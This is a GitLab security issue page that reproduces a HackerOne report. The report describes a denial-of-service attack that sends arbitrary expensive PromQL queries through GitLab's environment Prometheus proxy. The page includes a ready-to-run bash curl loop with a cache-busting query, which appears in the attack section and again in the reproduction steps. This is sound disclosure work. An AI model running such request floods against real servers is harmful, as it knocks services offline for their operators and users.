Skip to content

DOS and high resource consumption of Prometheus server through abuse of Prometheus integration proxy endpoint

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #1723124 by joaxcar on 2022-10-04, assigned to @truegreg:

Report | Attachments | How To Reproduce

Report

This report is similar to my other report https://hackerone.com/reports/1723106 but the two endpoints grafana/proxy and prometheus/proxy are different and they execute similar but different code paths in the backend. The also have different use cases that might make the fixes differ. Thus I report these two separately, but feel free to connect them in the beginning if that makes it easier.

Summary

I am no Prometheus expert, so the described scenario can probably be expanded and improved upon (from a DoS perspective). But I did force my docker container with 16 cores to work at 100% CPU constant with only 20 requests (the requests are asynchronous, meaning that the connection from the attacker to GitLab will succeed, while the connection between GitLab and Prometheus will persist). When the attack was executed, I could not restart Prometheus from the terminal with gitlab-ctl stop prometheus as the service was unresponsive and a gitlab-ctl restart did not fix it. I had to stop the docker container to have it stop. The impact of the attack depend somewhat on the amount of data on the Prometheus server, but as I only test this on my localhost GitLab Prometheus server it is almost empty compared to real life servers.

Prometheus feature

A user can configure a Prometheus integration and add custom queries that show up in the metrics panel of any environment.

See https://docs.gitlab.com/ee/user/project/integrations/prometheus.html for info on the integration

See https://docs.gitlab.com/ee/operations/metrics/ for environment metrics

A configured environment will get a Prometheus proxy at https://gitlab.example.com/group1/project1/-/environments/2/prometheus/api/v1/query_range

Custom metrics are configured by a maintainer of the project, but any user with ANY access to the project can run arbitrary queries towards the query_range endpoint

The setup

I booted up a GitLab Omnibus instance in a docker container, this includes a Grafana instance (https://gitlab.example.com/-/grafana) and a Prometheus instance (http://localhost:9090). I also configured SSL and a (spoofed with host file) DNS record of my server.

The Grafana instance already have the Prometheus instance as a datasource, so its possible to use this instance for test purposes. I then configured the Grafana integration in a public project, following https://docs.gitlab.com/ee/operations/metrics/embed_grafana.html .

You might need to run the server for a while to have some data in Prometheus. After a fresh boot I used Burp to perform a scan towards my localhost GitLab instance to fill up the server with HTTP requests, I did this two times with a spacing of 24 hours.

The attack

As an unauthenticated user, I can now DOS the Prometheus server (and possibly also affect the overall system state of the docker instance) by running this command in a terminal

for index in {1..20}  
do  
curl 'https://gitlab.example.com/group1/project1/-/environments/2/prometheus/api/v1/query_range?query=min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100'$index'h%5D)))&start_time=1654749435&end_time=1654771035&step=15'  
done  

To get it working, you might need to modify start_time and end_time to something relevant (use date +%s in a terminal to get current timestamp). If 20 requests are not enough, try to increase the number.

In the docker image run htop or top to monitor the CPU

Some details

The anatomy of the requests looks like this pulled apart

https://gitlab.example.com/group1/project1/-/environments/2/prometheus/api/v1/query_range <-- The project proxy endpoint

?query= <-- Start of query

<--  An expensive query, just a mess that I made up trying to eat resources  -->  
min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100

$index <-- Index used as cache buster

h%5D)))&start_time=1654749435&end_time=1654771035&step=15  

Important to note is that the query is arbitrary, I just tried to construct one that was heavy enough to tilt the server. This could probably be made way heavier. Also note the use of index in the query, this is a "cache buster" that is needed as GitLab backend will not run multiple commands towards Prometheus if the query is identical.

Result

Here is a video showing running the query towards my local server

dos.mp4

Steps to reproduce

(if you have any other Prometheus instance you can test use that one. I will describe the attack with docker GitLab omnibus)

  1. Boot up a docker image of the latest gitlab omnibus (see https://docs.gitlab.com/ee/install/docker.html)
  2. Log in as admin and go to http://gitlab.example.com/admin/application_settings/network and expand outbound requests
  3. Enable requests from webhook and services to localhost (this is to be able to use the built in Prometheus instance)
  4. Create a new project on the GitLab instance
  5. Go to http://gitlab.example.com/GROUP/PROJECT/-/settings/integrations/prometheus/edit and enable the integration. Use the server http://localhost:9090
  6. Go to http://gitlab.example.com/-/environments and create an environment
  7. Now make sure to load the Prometheus instance with some data. Make a bunch of requests to the GitLab instance over a period of time
  8. Take a terminal and get a shell on the docker image. Ex
docker exec -it gitlab /bin/bash  
  1. run top to monitor CPU level
  2. Now open another terminal and run
date +%s  
  1. Take the current date and update this script starttime and endtime
for index in {1..100}  
do  
curl 'https://gitlab.example.com/group1/project1/-/environments/1/prometheus/api/v1/query_range?query=min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100'$index'h%5D)))&start_time=1654749435&end_time=1654771035&step=15'  
done  
  1. Run it and watch the CPU in top. If there is enough data in the instance all processors should spike to 100%

Impact

DOS and high resource consumption on Prometheus server

What is the current bug behavior?

There is no special permissions to run arbitrary queries Prometheus server, even if only maintainers are allowed to configure "custom queries"

There are two issues, first of any user with any access to the project can execute arbitrary queries (unauthenticated users on public projects). Second, as the queries are arbitrary they can be how complex as the attacker wants and thus break the Prometheus server.

What is the expected correct behavior?

Queries should be restricted to the configured ones.

Output of checks

This bug happens on GitLab.com

Results of GitLab environment info
System information  
System:  
Proxy:          no  
Current User:   git  
Using RVM:      no  
Ruby Version:   2.7.5p203  
Gem Version:    3.1.6  
Bundler Version:2.3.15  
Rake Version:   13.0.6  
Redis Version:  6.2.7  
Sidekiq Version:6.4.2  
Go Version:     unknown

GitLab information  
Version:        15.4.0-ee  
Revision:       abbda55531f  
Directory:      /opt/gitlab/embedded/service/gitlab-rails  
DB Adapter:     PostgreSQL  
DB Version:     13.6  
URL:            http://gitlab2.joaxcar.com  
HTTP Clone URL: http://gitlab2.joaxcar.com/some-group/some-project.git  
SSH Clone URL:  git@gitlab2.joaxcar.com:some-group/some-project.git  
Elasticsearch:  no  
Geo:            no  
Using LDAP:     no  
Using Omniauth: yes  
Omniauth Providers:

GitLab Shell  
Version:        14.10.0  
Repository storage paths:  
- default:      /var/opt/gitlab/git-data/repositories  
GitLab Shell path:              /opt/gitlab/embedded/service/gitlab-shell  

Impact

DOS and high resource consumption on Prometheus server

Impact

DOS and high resource consumption on Prometheus server

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: